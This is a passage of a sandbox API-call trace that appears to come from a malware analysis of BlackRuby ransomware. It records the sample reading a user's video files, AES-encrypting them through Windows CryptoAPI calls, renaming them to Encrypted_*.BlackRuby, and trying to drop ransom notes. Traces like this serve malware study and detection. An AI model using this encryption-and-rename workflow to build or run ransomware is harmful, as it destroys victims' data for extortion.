lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.612] GetLastError () returned 0x0 [0062.612] SetErrorMode (uMode=0x1) returned 0x0 [0062.612] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.613] GetLastError () returned 0xb7 [0062.613] GetFileType (hFile=0x258) returned 0x1 [0062.613] SetErrorMode (uMode=0x0) returned 0x1 [0062.614] GetFileType (hFile=0x258) returned 0x1 [0062.615] CloseHandle (hObject=0x258) returned 1 [0062.615] GetLastError () returned 0xb7 [0062.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.615] GetLastError () returned 0xb7 [0062.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_PTQ1EbOnu4UzwWkaDUqSYvyZ0A35y6AQ9hX8cndCL5ctD7S.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_PTQ1EbOnu4UzwWkaDUqSYvyZ0A35y6AQ9hX8cndCL5ctD7S.BlackRuby", lpFilePart=0x0) returned 0x80 [0062.615] GetLastError () returned 0xb7 [0062.615] SetErrorMode (uMode=0x1) returned 0x0 [0062.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d01c0, ftCreationTime.dwHighDateTime=0x1d34d57, ftLastAccessTime.dwLowDateTime=0xc229c8c0, ftLastAccessTime.dwHighDateTime=0x1d353e9, ftLastWriteTime.dwLowDateTime=0x2d839f40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xba60)) returned 1 [0062.615] GetLastError () returned 0xb7 [0062.615] SetErrorMode (uMode=0x0) returned 0x1 [0062.615] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_PTQ1EbOnu4UzwWkaDUqSYvyZ0A35y6AQ9hX8cndCL5ctD7S.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_ptq1ebonu4uzwwkaduqsyvyz0a35y6aq9hx8cndcl5ctd7s.blackruby")) returned 1 [0062.616] GetLastError () returned 0xb7 [0062.616] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.616] GetLastError () returned 0xb7 [0062.616] SetErrorMode (uMode=0x1) returned 0x0 [0062.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.616] GetLastError () returned 0x5 [0062.617] SetErrorMode (uMode=0x0) returned 0x1 [0062.617] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.617] GetLastError () returned 0x5 [0062.617] SetErrorMode (uMode=0x1) returned 0x0 [0062.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), fInfoLevelId=0x0, lpFileInformation=0x1caf02c | out: lpFileInformation=0x1caf02c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46aca5f0, ftCreationTime.dwHighDateTime=0x1d34aa7, ftLastAccessTime.dwLowDateTime=0xf348ef20, ftLastAccessTime.dwHighDateTime=0x1d352c3, ftLastWriteTime.dwLowDateTime=0xf348ef20, ftLastWriteTime.dwHighDateTime=0x1d352c3, nFileSizeHigh=0x0, nFileSizeLow=0x17c5d)) returned 1 [0062.617] GetLastError () returned 0x5 [0062.617] SetErrorMode (uMode=0x0) returned 0x1 [0062.617] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.618] GetLastError () returned 0x5 [0062.618] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.618] GetLastError () returned 0x5 [0062.618] SetErrorMode (uMode=0x1) returned 0x0 [0062.618] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.618] GetLastError () returned 0x0 [0062.618] GetFileType (hFile=0x258) returned 0x1 [0062.618] SetErrorMode (uMode=0x0) returned 0x1 [0062.618] GetFileType (hFile=0x258) returned 0x1 [0062.618] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x17c5d [0062.618] GetLastError () returned 0x0 [0062.618] ReadFile (in: hFile=0x258, lpBuffer=0x2c8aab0, nNumberOfBytesToRead=0x17c5d, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c8aab0*, lpNumberOfBytesRead=0x18ecac*=0x17c5d, lpOverlapped=0x0) returned 1 [0062.620] GetLastError () returned 0x0 [0062.620] CloseHandle (hObject=0x258) returned 1 [0062.620] GetLastError () returned 0x0 [0062.621] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.621] GetLastError () returned 0x0 [0062.621] SetErrorMode (uMode=0x1) returned 0x0 [0062.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46aca5f0, ftCreationTime.dwHighDateTime=0x1d34aa7, ftLastAccessTime.dwLowDateTime=0xf348ef20, ftLastAccessTime.dwHighDateTime=0x1d352c3, ftLastWriteTime.dwLowDateTime=0xf348ef20, ftLastWriteTime.dwHighDateTime=0x1d352c3, nFileSizeHigh=0x0, nFileSizeLow=0x17c5d)) returned 1 [0062.621] GetLastError () returned 0x0 [0062.621] SetErrorMode (uMode=0x0) returned 0x1 [0062.631] CryptImportKey (in: hProv=0x37c708, pbData=0x1d0b174, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360e60) returned 1 [0062.631] GetLastError () returned 0x0 [0062.631] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.631] GetLastError () returned 0x0 [0062.662] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.662] GetLastError () returned 0x0 [0062.662] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360aa0) returned 1 [0062.662] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.662] GetLastError () returned 0x0 [0062.662] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1d381c0*=0x1, dwFlags=0x0) returned 1 [0062.662] GetLastError () returned 0x0 [0062.662] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1d3818c, dwFlags=0x0) returned 1 [0062.662] GetLastError () returned 0x0 [0062.663] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cba4b0*, pdwDataLen=0x18ec9c*=0x17d50, dwBufLen=0x17d50 | out: pbData=0x2cba4b0*, pdwDataLen=0x18ec9c*=0x17d50) returned 1 [0062.664] GetLastError () returned 0x0 [0062.665] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d3821c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1d3821c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.665] GetLastError () returned 0x0 [0062.665] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d3824c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1d3824c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.665] GetLastError () returned 0x0 [0062.667] CryptDestroyKey (hKey=0x360e60) returned 1 [0062.667] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.667] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.667] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.667] GetLastError () returned 0x0 [0062.667] SetErrorMode (uMode=0x1) returned 0x0 [0062.667] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.669] GetLastError () returned 0xb7 [0062.669] GetFileType (hFile=0x258) returned 0x1 [0062.669] SetErrorMode (uMode=0x0) returned 0x1 [0062.669] GetFileType (hFile=0x258) returned 0x1 [0062.671] CloseHandle (hObject=0x258) returned 1 [0062.671] GetLastError () returned 0xb7 [0062.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi", lpFilePart=0x0) returned 0x50 [0062.671] GetLastError () returned 0xb7 [0062.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_CKSEJeybEfBJOQ7LLl3i6rOBNaA4pQXKJ8a4eqJHPy.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_CKSEJeybEfBJOQ7LLl3i6rOBNaA4pQXKJ8a4eqJHPy.BlackRuby", lpFilePart=0x0) returned 0x7b [0062.671] GetLastError () returned 0xb7 [0062.671] SetErrorMode (uMode=0x1) returned 0x0 [0062.671] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46aca5f0, ftCreationTime.dwHighDateTime=0x1d34aa7, ftLastAccessTime.dwLowDateTime=0xf348ef20, ftLastAccessTime.dwHighDateTime=0x1d352c3, ftLastWriteTime.dwLowDateTime=0x2d8d24c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17d60)) returned 1 [0062.671] GetLastError () returned 0xb7 [0062.671] SetErrorMode (uMode=0x0) returned 0x1 [0062.671] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\N9OkHS1nnYsWAy6.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\n9okhs1nnysway6.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_CKSEJeybEfBJOQ7LLl3i6rOBNaA4pQXKJ8a4eqJHPy.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_cksejeybefbjoq7lll3i6robnaa4pqxkj8a4eqjhpy.blackruby")) returned 1 [0062.672] GetLastError () returned 0xb7 [0062.672] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.672] GetLastError () returned 0xb7 [0062.672] SetErrorMode (uMode=0x1) returned 0x0 [0062.672] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.672] GetLastError () returned 0x5 [0062.673] SetErrorMode (uMode=0x0) returned 0x1 [0062.673] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.673] GetLastError () returned 0x5 [0062.673] SetErrorMode (uMode=0x1) returned 0x0 [0062.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1d55770 | out: lpFileInformation=0x1d55770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eb4590, ftCreationTime.dwHighDateTime=0x1d34dcc, ftLastAccessTime.dwLowDateTime=0x5c0b4ef0, ftLastAccessTime.dwHighDateTime=0x1d35a43, ftLastWriteTime.dwLowDateTime=0x5c0b4ef0, ftLastWriteTime.dwHighDateTime=0x1d35a43, nFileSizeHigh=0x0, nFileSizeLow=0x8ec1)) returned 1 [0062.673] GetLastError () returned 0x5 [0062.673] SetErrorMode (uMode=0x0) returned 0x1 [0062.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.677] GetLastError () returned 0x5 [0062.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.677] GetLastError () returned 0x5 [0062.677] SetErrorMode (uMode=0x1) returned 0x0 [0062.677] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.677] GetLastError () returned 0x0 [0062.677] GetFileType (hFile=0x258) returned 0x1 [0062.677] SetErrorMode (uMode=0x0) returned 0x1 [0062.677] GetFileType (hFile=0x258) returned 0x1 [0062.677] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x8ec1 [0062.677] GetLastError () returned 0x0 [0062.677] ReadFile (in: hFile=0x258, lpBuffer=0x1b52774, nNumberOfBytesToRead=0x8ec1, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1b52774*, lpNumberOfBytesRead=0x18ecac*=0x8ec1, lpOverlapped=0x0) returned 1 [0062.678] GetLastError () returned 0x0 [0062.678] CloseHandle (hObject=0x258) returned 1 [0062.678] GetLastError () returned 0x0 [0062.678] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.678] GetLastError () returned 0x0 [0062.678] SetErrorMode (uMode=0x1) returned 0x0 [0062.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eb4590, ftCreationTime.dwHighDateTime=0x1d34dcc, ftLastAccessTime.dwLowDateTime=0x5c0b4ef0, ftLastAccessTime.dwHighDateTime=0x1d35a43, ftLastWriteTime.dwLowDateTime=0x5c0b4ef0, ftLastWriteTime.dwHighDateTime=0x1d35a43, nFileSizeHigh=0x0, nFileSizeLow=0x8ec1)) returned 1 [0062.678] GetLastError () returned 0x0 [0062.678] SetErrorMode (uMode=0x0) returned 0x1 [0062.678] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c708) returned 1 [0062.678] GetLastError () returned 0x0 [0062.782] CryptImportKey (in: hProv=0x37c708, pbData=0x1bbe8ec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ae0) returned 1 [0062.782] GetLastError () returned 0x0 [0062.782] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.782] GetLastError () returned 0x0 [0062.787] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.787] GetLastError () returned 0x0 [0062.787] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360fa0) returned 1 [0062.787] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.787] GetLastError () returned 0x0 [0062.788] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1beb938*=0x1, dwFlags=0x0) returned 1 [0062.788] GetLastError () returned 0x0 [0062.788] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1beb904, dwFlags=0x0) returned 1 [0062.788] GetLastError () returned 0x0 [0062.788] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1beb980*, pdwDataLen=0x18ec9c*=0x8fc0, dwBufLen=0x8fc0 | out: pbData=0x1beb980*, pdwDataLen=0x18ec9c*=0x8fc0) returned 1 [0062.788] GetLastError () returned 0x0 [0062.788] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bfd92c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bfd92c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.788] GetLastError () returned 0x0 [0062.788] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bfd95c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bfd95c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.788] GetLastError () returned 0x0 [0062.788] CryptDestroyKey (hKey=0x360ae0) returned 1 [0062.788] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.788] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.788] GetLastError () returned 0x0 [0062.788] SetErrorMode (uMode=0x1) returned 0x0 [0062.788] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.789] GetLastError () returned 0xb7 [0062.789] GetFileType (hFile=0x258) returned 0x1 [0062.789] SetErrorMode (uMode=0x0) returned 0x1 [0062.789] GetFileType (hFile=0x258) returned 0x1 [0062.790] CloseHandle (hObject=0x258) returned 1 [0062.790] GetLastError () returned 0xb7 [0062.790] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv", lpFilePart=0x0) returned 0x4d [0062.790] GetLastError () returned 0xb7 [0062.790] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_OfhDUR5H7LaveppPnR4wIL4GGsaBkJsGslGPuSWsdRxMCC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_OfhDUR5H7LaveppPnR4wIL4GGsaBkJsGslGPuSWsdRxMCC.BlackRuby", lpFilePart=0x0) returned 0x7f [0062.790] GetLastError () returned 0xb7 [0062.790] SetErrorMode 